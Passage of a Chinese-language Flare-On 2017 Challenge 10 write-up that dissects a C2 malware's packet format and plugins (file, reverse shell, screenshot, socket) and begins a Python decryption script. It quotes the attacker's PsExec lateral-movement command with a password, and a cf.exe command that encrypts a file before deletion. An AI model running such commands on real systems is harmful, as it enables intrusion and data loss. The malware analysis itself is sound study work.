<p>透過 Python Socket 與 IDA 動態分析,可以找到 Socket 中接收 <code class="highlighter-rouge">Recv</code> 與 <code class="highlighter-rouge">Send</code> 函數,<code class="highlighter-rouge">sub_403210</code> 用於 <code class="highlighter-rouge">Recv</code> 與 <code class="highlighter-rouge">Decode</code>,<code class="highlighter-rouge">sub_403600</code> 用於 <code class="highlighter-rouge">Send</code> 與 <code class="highlighter-rouge">Encode</code>。其封包結構如下</p>
<table>
<thead>
<tr>
<th>Offset</th>
<th>Length</th>
<th>Contents</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x00</td>
<td>0x24 bytes</td>
<td>Decrypt Header</td>
</tr>
<tr>
<td>0x24</td>
<td>0x1c bytes</td>
<td>Compress Header</td>
</tr>
<tr>
<td>0x40</td>
<td>0x24 bytes</td>
<td>Processor Header</td>
</tr>
<tr>
<td>0x60</td>
<td>-</td>
<td>Data</td>
</tr>
</tbody>
</table>
<p>但初步嘗試封包解密時,只能透過未加密的前幾個封包理解 <code class="highlighter-rouge">Decrypt Header</code> 的結構,對於完整的封包結構還沒有足夠的資訊理解,在後續下載其他的 Plugin 後會獲得更完整的分析資訊。</p>
<p>此外,在解密封包的過程發現每個 Plugin 會有一個獨特的 ID (16 bytes) 用於識別,C2 Server 與 Client 溝通時,會呼叫某個 ID 來執行該 Plugin 的功能,從封包中我們也可以發現這些 Plugin 的 ID。</p>
<h3 id="decrypt-header-size-0x24">Decrypt Header (size: 0x24)</h3>
<table>
<thead>
<tr>
<th>Offset</th>
<th>Length</th>
<th>Contents</th>
<th>Example</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x00</td>
<td>4 bytes</td>
<td>year</td>
<td>32303137</td>
</tr>
<tr>
<td>0x04</td>
<td>4 bytes</td>
<td>crc32 checksum</td>
<td>3f2a4b2f</td>
</tr>
<tr>
<td>0x08</td>
<td>4 bytes</td>
<td>Packet header size</td>
<td>24000000</td>
</tr>
<tr>
<td>0x0C</td>
<td>4 bytes</td>
<td>data EncSize</td>
<td>60000000</td>
</tr>
<tr>
<td>0x10</td>
<td>4 bytes</td>
<td>data DecSize</td>
<td>60000000</td>
</tr>
<tr>
<td>0x14</td>
<td>16 bytes</td>
<td>(GUID) cryptor id</td>
<td>51298f741667d7ed2941950106f50545 -> default</td>
</tr>
</tbody>
</table>
<h3 id="compress-header-size-0x1c">Compress Header (size: 0x1c)</h3>
<table>
<thead>
<tr>
<th>Offset</th>
<th>Length</th>
<th>Contents</th>
<th>Example</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x24</td>
<td>4 bytes</td>
<td>Compress header size</td>
<td>1c000000</td>
</tr>
<tr>
<td>0x28</td>
<td>4 bytes</td>
<td>data EncSize</td>
<td>44000000</td>
</tr>
<tr>
<td>0x2c</td>
<td>4 bytes</td>
<td>data DecSize</td>
<td>44000000</td>
</tr>
<tr>
<td>0x3c</td>
<td>16 bytes</td>
<td>(GUID) compressor id</td>
<td>f37126ad88a5617eaf06000d424c5a21 -> default</td>
</tr>
</tbody>
</table>
<h3 id="processor-header-size-0x24">Processor Header (size: 0x24)</h3>
<table>
<thead>
<tr>
<th>Offset</th>
<th>Length</th>
<th>Contents</th>
<th>Example</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x40</td>
<td>4 bytes</td>
<td>version</td>
<td>17041720</td>
</tr>
<tr>
<td>0x44</td>
<td>4 bytes</td>
<td>cmd</td>
<td>07000000</td>
</tr>
<tr>
<td>0x48</td>
<td>4 bytes</td>
<td>msgId</td>
<td>08000000</td>
</tr>
<tr>
<td>0x4c</td>
<td>4 bytes</td>
<td>status</td>
<td>00000000</td>
</tr>
<tr>
<td>0x50</td>
<td>4 bytes</td>
<td>status</td>
<td>00000000</td>
</tr>
<tr>
<td>0x54</td>
<td>16 bytes</td>
<td>(GUID) processor id</td>
<td>155bbf4a1efe1517734604b9d42b80e8 -> default</td>
</tr>
</tbody>
</table>
<h2 id="第五階段-分析-plugins-解密封包與還原-c2-server">第五階段: 分析 Plugins 解密封包與還原 C2 Server</h2>
<p>為了加速分析速度,可以 diff 看一下這些 dll 那些函數不同,不同的函數可能是該 dll 的重要功能,透過 diff 可以節省許多的時間而專注在那些重要的功能。</p>
<h3 id="decrypt-id-crpt">Decrypt ID (CRPT)</h3>
<table>
<thead>
<tr>
<th>Decrypt ID</th>
<th>Name</th>
<th>Version</th>
<th>Context</th>
</tr>
</thead>
<tbody>
<tr>
<td>51298F741667D7ED2941950106F50545</td>
<td>-</td>
<td>-</td>
<td>Default</td>
</tr>
<tr>
<td>c30b1a2dcb489ca8a724376469cf6782</td>
<td>r.dll</td>
<td>1.0.4</td>
<td>Rc4</td>
</tr>
<tr>
<td>38be0f624ce274fc61f75c90cb3f5915</td>
<td>t.dll</td>
<td>1.1.8</td>
<td>simple substitution cipher</td>
</tr>
<tr>
<td>ba0504fcc08f9121d16fd3fed1710e60</td>
<td>6.dll</td>
<td>1.0.4</td>
<td>CustomBase64</td>
</tr>
<tr>
<td>b2e5490d2654059bbbab7f2a67fe5ff4</td>
<td>x.dll</td>
<td>1.0.1</td>
<td>XTEA</td>
</tr>
</tbody>
</table>
<h3 id="compress-id-comp">Compress ID (COMP)</h3>
<table>
<thead>
<tr>
<th>Compress ID</th>
<th>Name</th>
<th>Version</th>
<th>Context</th>
</tr>
</thead>
<tbody>
<tr>
<td>f37126ad88a5617eaf06000d424c5a21</td>
<td>-</td>
<td>-</td>
<td>Default</td>
</tr>
<tr>
<td>5fd8ea0e9d0a92cbe425109690ce7da2</td>
<td>z.dll</td>
<td>1.2.11</td>
<td>Zlib</td>
</tr>
</tbody>
</table>
<h3 id="processor-id-cmd">Processor ID (CMD)</h3>
<table>
<thead>
<tr>
<th>Processor ID</th>
<th>Name</th>
<th>Version</th>
<th>Context</th>
</tr>
</thead>
<tbody>
<tr>
<td>155bbf4a1efe1517734604b9d42b80e8</td>
<td>-</td>
<td>-</td>
<td>Default</td>
</tr>
<tr>
<td>f47c51070fa8698064b65b3b6e7d30c6</td>
<td>f.dll</td>
<td>2.1.2</td>
<td>File</td>
</tr>
<tr>
<td>f46d09704b40275fb33790a362762e56</td>
<td>s.dll</td>
<td>1.1.0</td>
<td>Shell</td>
</tr>
<tr>
<td>a3aecca1cb4faa7a9a594d138a1bfbd5</td>
<td>m.dll</td>
<td>1.0.4</td>
<td>Screen</td>
</tr>
<tr>
<td>77d6ce92347337aeb14510807ee9d7be</td>
<td>p.dll</td>
<td>1.3.0</td>
<td>Socket</td>
</tr>
</tbody>
</table>
<h4 id="processor-id-f47c51070fa8698064b65b3b6e7d30c6---file">Processor ID: f47c51070fa8698064b65b3b6e7d30c6 -> File</h4>
<p><code class="highlighter-rouge">0x100058B0</code> 用於 <code class="highlighter-rouge">Recv</code> 封包資料,其指令集</p>
<table>
<thead>
<tr>
<th>Command</th>
<th>Action</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x1</td>
<td>GetDriveInfo: 每個 drive 0x228 bytes</td>
</tr>
<tr>
<td>0x2</td>
<td>List directory</td>
</tr>
<tr>
<td>0x3</td>
<td>Download File (to server)</td>
</tr>
<tr>
<td>0x5</td>
<td>Close File</td>
</tr>
<tr>
<td>0x6</td>
<td>Upload File (to client), 開一個檔案用於寫入,header 包含一組 SHA1</td>
</tr>
<tr>
<td>0x7</td>
<td>寫完檔案會產生一組 SHA1,用於與 cmd = 0x6 產生的 SHA1 比較確認是否完成</td>
</tr>
<tr>
<td>0x8</td>
<td>Ping</td>
</tr>
<tr>
<td>0x9</td>
<td>Ping</td>
</tr>
<tr>
<td>0xa</td>
<td>Ping</td>
</tr>
</tbody>
</table>
<h4 id="processor-id-f46d09704b40275fb33790a362762e56---shell">Processor ID: f46d09704b40275fb33790a362762e56 -> Shell</h4>
<p>此 plugin 用途類似 <code class="highlighter-rouge">cmd.exe</code>,在 <code class="highlighter-rouge">0x100019B0</code> 用於 <code class="highlighter-rouge">Recv</code> 資料,而 <code class="highlighter-rouge">0x100017D0</code> 負責接收 Shell 回傳的 Response,其指令集為</p>
<table>
<thead>
<tr>
<th>Command</th>
<th>Action</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x1</td>
<td>Start Shell (<code class="highlighter-rouge">Windows Reverse Shell</code>)</td>
</tr>
<tr>
<td>0x2</td>
<td>Close Shell</td>
</tr>
<tr>
<td>0x3</td>
<td>Cmd 指令</td>
</tr>
<tr>
<td>0x4</td>
<td>Shell Response</td>
</tr>
</tbody>
</table>
<h4 id="processor-id--a3aecca1cb4faa7a9a594d138a1bfbd5---screen">Processor ID = a3aecca1cb4faa7a9a594d138a1bfbd5 -> Screen</h4>
<p>用於螢幕截圖與傳送圖片,這裡需要理解 BMP 檔案格式,其指令集為</p>
<table>
<thead>
<tr>
<th>Command</th>
<th>Action</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x1</td>
<td>Take Screenshot</td>
</tr>
<tr>
<td>0x2</td>
<td><code class="highlighter-rouge">BITMAPFILEHEADER</code>: size, width, height, color_depths</td>
</tr>
<tr>
<td>0x3</td>
<td>Collect bitmap data</td>
</tr>
</tbody>
</table>
<p>BITMAPFILEHEADER</p>
<table>
<thead>
<tr>
<th>Header info</th>
<th>context</th>
</tr>
</thead>
<tbody>
<tr>
<td>Size</td>
<td>1064</td>
</tr>
<tr>
<td>width</td>
<td>1418</td>
</tr>
<tr>
<td>hight</td>
<td>730</td>
</tr>
<tr>
<td>color depths</td>
<td>8 bit per pixel</td>
</tr>
</tbody>
</table>
<p>我們會透過這個 Plugin 獲得一個 BMP 檔案<code class="highlighter-rouge">screen_1037678.bmp</code> 裡面有後續會用到的 Zip 解壓縮密碼 <code class="highlighter-rouge">infectedinfectedinfectedinfectedinfected919</code></p>
<p><img src="https://i.imgur.com/TyWyjGv.png" alt="" /></p>
<h4 id="processor-id--77d6ce92347337aeb14510807ee9d7be---socket">Processor ID = 77d6ce92347337aeb14510807ee9d7be -> Socket</h4>
<p>我們可以透過這個 Plugin 錄 Server 的封包,還原出更多的資訊</p>
<table>
<thead>
<tr>
<th>command</th>
<th>Action</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x1</td>
<td>Start Socket</td>
</tr>
<tr>
<td>0x2</td>
<td>Colse Socket</td>
</tr>
<tr>
<td>0x3</td>
<td>Connect</td>
</tr>
<tr>
<td>0x4</td>
<td>Recv</td>
</tr>
</tbody>
</table>
<h3 id="c2-server-srv2exepseexe-與-cfexe-以及-client-封包資訊整理">C2 Server (srv2.exe)、pse.exe 與 cf.exe 以及 Client 封包資訊整理</h3>
<p>除了以上提到的 Plugins,在解密的過程我們可以從封包中收集到一些有用的資訊,例如受害者資訊與 <code class="highlighter-rouge">lab10</code> 的資訊,以及一些檔案</p>
<ul>
<li>透過 m.dll 在 <code class="highlighter-rouge">192.168.221.91</code> 主機上截圖取得 zip 密碼 <code class="highlighter-rouge">infectedinfectedinfectedinfectedinfected919</code></li>
<li>透過 s.dll 查看了 <code class="highlighter-rouge">c:\work\FlareOn2017\Challenge_10</code> 目錄下 TODO.txt 文件,內容是 <code class="highlighter-rouge">Check with Larry about this.</code></li>
<li>透過 s.dll 執行 <code class="highlighter-rouge">ping larryjohnson-pc</code> 得知 Client 的 IP 為 <code class="highlighter-rouge">192.168.221.105</code>。</li>
<li>透過 f.dll 下載 <code class="highlighter-rouge">pse.exe</code> 和 <code class="highlighter-rouge">srv2.exe</code>,<code class="highlighter-rouge">pse.exe</code> 就是 Windows Sysinternals 的 PsExec,可以遠端執行指令的工具,透過 <code class="highlighter-rouge">pse.exe</code> 在內網橫向移動到 <code class="highlighter-rouge">192.168.221.105</code> 執行 <code class="highlighter-rouge">srv2.exe</code>,並監聽 Port <code class="highlighter-rouge">16452</code>,其指令為 <code class="highlighter-rouge">pse.exe \\larryjohnson-pc -i -c -f -d -u larry.johnson -p n3v3rgunnag1veUup -accepteula srv2.exe</code>。而 <code class="highlighter-rouge">srv2.exe</code> 就是 C2 Server,跟 Client <code class="highlighter-rouge">secondstage.exe</code>,不同之處是 <code class="highlighter-rouge">secondstage.exe</code> 會主動連線,而 <code class="highlighter-rouge">srv2.exe</code> 是被動連線。</li>
<li>在 larryjohnson-pc 中下載用於加密的程式 <code class="highlighter-rouge">c:\staging\cf.exe</code></li>
<li>利用加密程式 <code class="highlighter-rouge">cf.exe</code> 對 <code class="highlighter-rouge">lab10</code> 進行加密,之後將原始文件刪除,並且通過 Socket 傳到 Server</li>
</ul>
<p>原先我們只有 Client 的程式與封包,但解密完 Client 的封包後我們獲得 C2 Server 的程式與封包,接下來將會對 C2 Server 的封包進行解密,收集更多關於 <code class="highlighter-rouge">lab10</code> 的資訊。</p>
<h2 id="第六階段-解密-c2-server-的封包">第六階段: 解密 C2 Server 的封包</h2>
<p>在解密完 Client 的封包後,這個階段會解密 C2 Server 的封包,還原 Server 的資訊與指令等</p>
<h3 id="decrypt-id-crpt-1">Decrypt ID (CRPT)</h3>
<table>
<thead>
<tr>
<th>Decrypt ID</th>
<th>Name</th>
<th>Context</th>
</tr>
</thead>
<tbody>
<tr>
<td>2965e4a19b6e9d9473f5f54dfef93533</td>
<td>b.dll</td>
<td>Blowfish</td>
</tr>
<tr>
<td>8746e7b7b0c1b9cf3f11ecae78a3a4bc</td>
<td>e.dll</td>
<td>SimpleXOR</td>
</tr>
<tr>
<td>46c5525904f473ace7bb8cb58b29968a</td>
<td>d.dll</td>
<td>DES3</td>
</tr>
<tr>
<td>9b1f6ec7d9b42bf7758a094a2186986b</td>
<td>c.dll</td>
<td>Camellia</td>
</tr>
</tbody>
</table>
<h3 id="compress-id-comp-1">Compress ID (COMP)</h3>
<table>
<thead>
<tr>
<th>Compress ID</th>
<th>Name</th>
<th>Context</th>
</tr>
</thead>
<tbody>
<tr>
<td>0a7874d2478a7713705e13dd9b31a6b1</td>
<td>l.dll</td>
<td>Lzo</td>
</tr>
<tr>
<td>503b6412c75a7c7558d1c92683225449</td>
<td>a.dll</td>
<td>ApLib</td>
</tr>
</tbody>
</table>
<h3 id="server-的資訊">Server 的資訊</h3>
<table>
<thead>
<tr>
<th>Computer Info</th>
<th>context</th>
</tr>
</thead>
<tbody>
<tr>
<td>version</td>
<td>2.1.0</td>
</tr>
<tr>
<td>computer name</td>
<td>LARRYJOHNSON-PC</td>
</tr>
<tr>
<td>user name</td>
<td>larry.johnson</td>
</tr>
<tr>
<td>group name</td>
<td>feye2017 srv</td>
</tr>
</tbody>
</table>
<h3 id="server-封包資訊整理">Server 封包資訊整理</h3>
<ul>
<li>截取 BMP 圖檔 (32 bits),可能是提醒解題者解題方向與 <code class="highlighter-rouge">lab10</code> 有關</li>
</ul>
<p><img src="https://i.imgur.com/r8EByPw.png" alt="" /></p>
<ul>
<li>用 <code class="highlighter-rouge">cf.exe</code> 來加密 lab10.zip 變成 <code class="highlighter-rouge">lab10.zip.cry</code>,指令是 <code class="highlighter-rouge">c:\staging\cf.exe lab10.zip tCqlc2+fFiLcuq1ee1eAPOMjxcdijh8z0jrakMA/jxg=</code></li>
<li>刪除 <code class="highlighter-rouge">lab10.zip</code> 並關閉 shell</li>
</ul>
<h2 id="第七階段-還原-lab10zipcry">第七階段: 還原 lab10.zip.cry</h2>
<p><code class="highlighter-rouge">lab10.zip.cry</code> 是開頭為 <code class="highlighter-rouge">cryp</code> 且大小為 561972 bytes 的檔案,可以從 C2 Server 封包中 Dump 出來,因為從封包中可以看出加密程式 <code class="highlighter-rouge">cf.exe</code> 對 <code class="highlighter-rouge">lab10</code> 進行加密後會將原始文件刪除,並且通過 Socket 傳到 Server</p>
<p><img src="https://i.imgur.com/3imYvqG.png" alt="" /></p>
<h3 id="分析加密程式-cfexe">分析加密程式 <code class="highlighter-rouge">cf.exe</code></h3>
<p><code class="highlighter-rouge">cf.exe</code> 是用 <code class="highlighter-rouge">.NET</code> 寫的,可以用 <code class="highlighter-rouge">dnSpy</code> 來看。<code class="highlighter-rouge">cf.exe</code> 使用 AES 加密演算法對資料進行加密,並將資料的 sha256、路徑、文件大小、加密使用的 iv 保存在 Header,並在開頭增加 <code class="highlighter-rouge">cryp</code></p>
<p><img src="https://i.imgur.com/QE82WUZ.png" alt="" /></p>
<p>寫 decrypt 並用從 BMP 圖檔獲得的密碼來解開 <code class="highlighter-rouge">infectedinfectedinfectedinfectedinfected919</code></p>
<p><img src="https://i.imgur.com/QMwWW3X.png" alt="" /></p>
<h3 id="取得-flag">取得 flag</h3>
<p>The answer is: <code class="highlighter-rouge">n3v3r_gunna_l3t_you_down_1987_4_ever@flare-on.com</code></p>
<hr />
<h2 id="附錄一-解密封包的-packetdecodepy">附錄一: 解密封包的 <code class="highlighter-rouge">PacketDecode.py</code></h2>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">struct</span>
<span class="kn">import</span> <span class="nn">json</span>
<span class="kn">import</span> <span class="nn">string</span>
<span class="kn">import</span> <span class="nn">base64</span>
<span class="kn">import</span> <span class="nn">xtea</span> <span class="c">#pip install xtea</span>
<span class="kn">import</span> <span class="nn">camellia</span> <span class="c">#pip install python-camellia</span>
<span class="kn">from</span> <span class="nn">termcolor</span> <span class="kn">import</span> <span class="n">colored</span>
<span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">from</span> <span class="nn">Crypto.Cipher</span> <span class="kn">import</span> <span class="n">Blowfish</span>
<span class="kn">from</span> <span class="nn">Crypto.Cipher</span> <span class="kn">import</span> <span class="n">DES3</span>
<span class="n">plugin_data</span> <span class="o">=</span> <span class="s">""</span>
<span class="n">plugin_size</span> <span class="o">=</span> <span class="s">""</span>
<span class="n">bmp_header</span> <span class="o">=</span> <span class="s">""</span>
<span class="n">bmp_body</span> <span class="o">=</span> <span class="s">""</span>
<span class="n">file_name</span> <span class="o">=</span> <span class="s">""</span>
<span class="n">file_data</span> <span class="o">=</span> <span class="s">""</span>
<span class="n">recv_data</span> <span class="o">=</span> <span class="s">""</span>
<span class="n">send_data</span> <span class="o">=</span> <span class="s">""</span>
<span class="n">DUMP_FILE</span> <span class="o">=</span> <span class="bp">True</span>
<span class="c">######################################## read packet functions ######################################## </span>
<span class="k">def</span> <span class="nf">read_stage2_packet</span><span class="p">():</span>
<span class="k">with</span> <span class="nb">open</span> <span class="p">(</span><span class="s">'packet.json'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
<span class="n">packet</span> <span class="o">=</span> <span class="n">json</span><span class="o">.</span><span class="n">load</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
<span class="k">return</span> <span class="n">packet</span>
<span class="k">def</span> <span class="nf">read_stage3_packet</span><span class="p">(</span><span class="n">binary</span><span class="p">):</span>
<span class="nb">file</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">binary</span><span class="p">)</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
<span class="k">return</span> <span class="s">''</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="nb">file</span><span class="p">)</span>
<span class="c">############################################ dump functions ########################################### </span>
<span class="k">def</span> <span class="nf">hexdump</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">length</span><span class="o">=</span><span class="mi">16</span><span class="p">):</span>
<span class="n">FILTER</span> <span class="o">=</span> <span class="s">''</span><span class="o">.</span><span class="n">join</span><span class="p">([(</span><span class="nb">len</span><span class="p">(</span><span class="nb">repr</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="n">x</span><span class="p">)))</span> <span class="o">==</span> <span class="mi">3</span><span class="p">)</span> <span class="ow">and</span> <span class="nb">chr</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="ow">or</span> <span class="s">'.'</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">256</span><span class="p">)])</span>
<span class="n">lines</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="nb">xrange</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">src</span><span class="p">),</span> <span class="n">length</span><span class="p">):</span>
<span class="n">chars</span> <span class="o">=</span> <span class="n">src</span><span class="p">[</span><span class="n">c</span><span class="p">:</span><span class="n">c</span><span class="o">+</span><span class="n">length</span><span class="p">]</span>
<span class="nb">hex</span> <span class="o">=</span> <span class="s">' '</span><span class="o">.</span><span class="n">join</span><span class="p">([</span><span class="s">"</span><span class="si">%02</span><span class="s">x"</span> <span class="o">%</span> <span class="nb">ord</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">chars</span><span class="p">])</span>
<span class="n">printable</span> <span class="o">=</span> <span class="s">''</span><span class="o">.</span><span class="n">join</span><span class="p">([</span><span class="s">"</span><span class="si">%</span><span class="s">s"</span> <span class="o">%</span> <span class="p">((</span><span class="nb">ord</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="o"><=</span> <span class="mi">127</span> <span class="ow">and</span> <span class="n">FILTER</span><span class="p">[</span><span class="nb">ord</span><span class="p">(</span><span class="n">x</span><span class="p">)])</span> <span class="ow">or</span> <span class="s">'.'</span><span class="p">)</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">chars</span><span class="p">])</span>
<span class="n">lines</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="s">"</span><span class="si">%04</span><span class="s">x </span><span class="si">%-*</span><span class="s">s </span><span class="si">%</span><span class="s">s</span><span class="se">\n</span><span class="s">"</span> <span class="o">%</span> <span class="p">(</span><span class="n">c</span><span class="p">,</span> <span class="n">length</span><span class="o">*</span><span class="mi">3</span><span class="p">,</span> <span class="nb">hex</span><span class="p">,</span> <span class="n">printable</span><span class="p">))</span>
<span class="k">return</span> <span class="s">''</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">lines</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">dump</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">data</span><span class="p">):</span>
<span class="k">if</span> <span class="n">DUMP_FILE</span><span class="p">:</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">exists</span><span class="p">(</span><span class="s">"dump"</span><span class="p">):</span>
<span class="n">os</span><span class="o">.</span><span class="n">makedirs</span><span class="p">(</span><span class="s">"dump"</span><span class="p">)</span>
<span class="nb">open</span><span class="p">(</span><span class="s">"./dump/"</span> <span class="o">+</span> <span class="n">name</span><span class="p">,</span> <span class="s">"wb"</span><span class="p">)</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">save_bmp</span><span class="p">(</span><span class="n">bmp_header</span><span class="p">,</span> <span class="n">bmp_body</span><span class="p">):</span>
<span class="n">bmp</span> <span class="o">=</span> <span class="s">"BM"</span>
<span class="n">bmp</span> <span class="o">+=</span> <span class="n">p32</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">bmp_header</span><span class="p">)</span><span class="o">+</span><span class="nb">len</span><span class="p">(</span><span class="n">bmp_body</span><span class="p">)</span><span class="o">+</span><span class="mi">14</span><span class="p">)</span>
<span class="n">bmp</span> <span class="o">+=</span> <span class="n">p32</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="c"># bmp += p32(1078)</span>
<span class="n">bmp</span> <span class="o">+=</span> <span class="n">p32</span><span class="p">(</span><span class="mi">54</span><span class="p">)</span>
<span class="n">bmp</span> <span class="o">+=</span> <span class="n">bmp_header</span>
<span class="n">bmp</span> <span class="o">+=</span> <span class="n">bmp_body</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"Save BMP"</span><span class="p">,</span> <span class="s">'magenta'</span><span class="p">)</span>
<span class="n">dump</span><span class="p">(</span><span class="s">"screen_</span><span class="si">%</span><span class="s">d.bmp"</span> <span class="o">%</span> <span class="nb">len</span><span class="p">(</span><span class="n">bmp</span><span class="p">),</span> <span class="n">bmp</span><span class="p">)</span>
<span class="c">########################################## decrypt functions ########################################## </span>
<span class="k">def</span> <span class="nf">RC4</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">key</span><span class="p">):</span>
<span class="n">S</span> <span class="o">=</span> <span class="nb">range</span><span class="p">(</span><span class="mi">256</span><span class="p">);</span><span class="n">j</span> <span class="o">=</span> <span class="mi">0</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">256</span><span class="p">):</span>
<span class="n">j</span> <span class="o">=</span> <span class="p">(</span><span class="n">j</span> <span class="o">+</span> <span class="n">S</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">+</span> <span class="nb">ord</span><span class="p">(</span><span class="n">key</span><span class="p">[</span><span class="n">i</span><span class="o">%</span><span class="nb">len</span><span class="p">(</span><span class="n">key</span><span class="p">)]))</span> <span class="o">%</span> <span class="mi">256</span>
<span class="n">S</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">S</span><span class="p">[</span><span class="n">j</span><span class="p">]</span> <span class="o">=</span> <span class="n">S</span><span class="p">[</span><span class="n">j</span><span class="p">],</span> <span class="n">S</span><span class="p">[</span><span class="n">i</span><span class="p">]</span>
<span class="n">j</span> <span class="o">=</span> <span class="mi">0</span>
<span class="n">i</span> <span class="o">=</span> <span class="mi">0</span>
<span class="n">res</span> <span class="o">=</span> <span class="s">""</span>
<span class="k">for</span> <span class="n">d</span> <span class="ow">in</span> <span class="n">data</span><span class="p">:</span>
<span class="n">i</span> <span class="o">=</span> <span class="p">(</span><span class="n">i</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">%</span> <span class="mi">256</span>
<span class="n">j</span> <span class="o">=</span> <span class="p">(</span><span class="n">j</span> <span class="o">+</span> <span class="n">S</span><span class="p">[</span><span class="n">i</span><span class="p">])</span> <span class="o">%</span> <span class="mi">256</span>
<span class="n">S</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">S</span><span class="p">[</span><span class="n">j</span><span class="p">]</span> <span class="o">=</span> <span class="n">S</span><span class="p">[</span><span class="n">j</span><span class="p">],</span> <span class="n">S</span><span class="p">[</span><span class="n">i</span><span class="p">]</span>
<span class="n">res</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">d</span><span class="p">)</span> <span class="o">^</span> <span class="n">S</span><span class="p">[(</span><span class="n">S</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">+</span> <span class="n">S</span><span class="p">[</span><span class="n">j</span><span class="p">])</span> <span class="o">%</span> <span class="mi">256</span><span class="p">])</span>
<span class="k">return</span> <span class="n">res</span>
<span class="k">def</span> <span class="nf">simple_substitution_cipher</span><span class="p">(</span><span class="n">body</span><span class="p">):</span>
<span class="n">m</span> <span class="o">=</span> <span class="p">[</span><span class="mh">0xC7</span><span class="p">,</span><span class="mh">0x19</span><span class="p">,</span><span class="mh">0x30</span><span class="p">,</span><span class="mh">0x0C</span><span class="p">,</span><span class="mh">0xA8</span><span class="p">,</span><span class="mh">0x10</span><span class="p">,</span><span class="mh">0xAD</span><span class="p">,</span><span class="mh">0xD5</span><span class="p">,</span><span class="mh">0xD4</span><span class="p">,</span><span class="mh">0x16</span><span class="p">,</span><span class="mh">0x52</span><span class="p">,</span><span class="mh">0xFC</span><span class="p">,</span><span class="mh">0x1B</span><span class="p">,</span><span class="mh">0x82</span><span class="p">,</span><span class="mh">0x7D</span><span class="p">,</span><span class="mh">0x32</span><span class="p">,</span><span class="mh">0x34</span><span class="p">,</span><span class="mh">0x01</span><span class="p">,</span><span class="mh">0xE6</span><span class="p">,</span><span class="mh">0x4C</span><span class="p">,</span><span class="mh">0x12</span><span class="p">,</span><span class="mh">0x08</span><span class="p">,</span><span class="mh">0x2B</span><span class="p">,</span><span class="mh">0xF7</span><span class="p">,</span><span class="mh">0xAC</span><span class="p">,</span><span class="mh">0x8B</span><span class="p">,</span><span class="mh">0x3F</span><span class="p">,</span><span class="mh">0x67</span><span class="p">,</span><span class="mh">0x48</span><span class="p">,</span><span class="mh">0x72</span><span class="p">,</span><span class="mh">0x21</span><span class="p">,</span><span class="mh">0xDC</span><span class="p">,</span><span class="mh">0xED</span><span class="p">,</span><span class="mh">0xF6</span><span class="p">,</span><span class="mh">0x85</span><span class="p">,</span><span class="mh">0xB8</span><span class="p">,</span><span class="mh">0x4F</span><span class="p">,</span><span class="mh">0x5F</span><span class="p">,</span><span class="mh">0x53</span><span class="p">,</span><span class="mh">0x0A</span><span class="p">,</span><span class="mh">0x04</span><span class="p">,</span><span class="mh">0x28</span><span class="p">,</span><span class="mh">0xDF</span><span class="p">,</span><span class="mh">0xD8</span><span class="p">,</span><span class="mh">0x7E</span><span class="p">,</span><span class="mh">0x06</span><span class="p">,</span><span class="mh">0x3D</span><span class="p">,</span><span class="mh">0x03</span><span class="p">,</span><span class="mh">0x40</span><span class="p">,</span><span class="mh">0x36</span><span class="p">,</span><span class="mh">0x68</span><span class="p">,</span><span class="mh">0x73</span><span class="p">,</span><span class="mh">0x25</span><span class="p">,</span><span class="mh">0xB7</span><span class="p">,</span><span class="mh">0x5D</span><span class="p">,</span><span class="mh">0x1E</span><span class="p">,</span><span class="mh">0xD2</span><span class="p">,</span><span class="mh">0x0D</span><span class="p">,</span><span class="mh">0xC6</span><span class="p">,</span><span 